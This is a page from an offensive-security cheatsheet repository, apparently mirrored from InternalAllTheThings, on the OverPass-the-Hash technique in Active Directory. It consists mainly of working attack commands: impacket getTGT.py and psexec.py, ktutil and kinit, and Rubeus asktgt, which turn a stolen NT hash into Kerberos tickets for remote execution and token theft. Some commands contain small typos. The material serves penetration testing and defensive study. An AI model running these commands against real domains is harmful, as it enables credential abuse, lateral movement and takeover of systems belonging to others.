daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

hash-over-pass-the-hash.md (1508B)


      1 ---
      2 title: "Hash - OverPass-the-Hash"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/hash-over-pass-the-hash.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/hash-over-pass-the-hash.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Hash - OverPass-the-Hash
     12 
     13 > In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).
     14 
     15 ## Using impacket
     16 
     17 ```bash
     18 root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com
     19 root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
     20 root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass
     21 
     22 root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
     23 root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
     24 root@kali:~$ klist
     25 ```
     26 
     27 ## Using Rubeus
     28 
     29 ```powershell
     30 # Request a TGT as the target user and pass it into the current session
     31 # NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
     32 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
     33 
     34 # Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
     35 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
     36 ```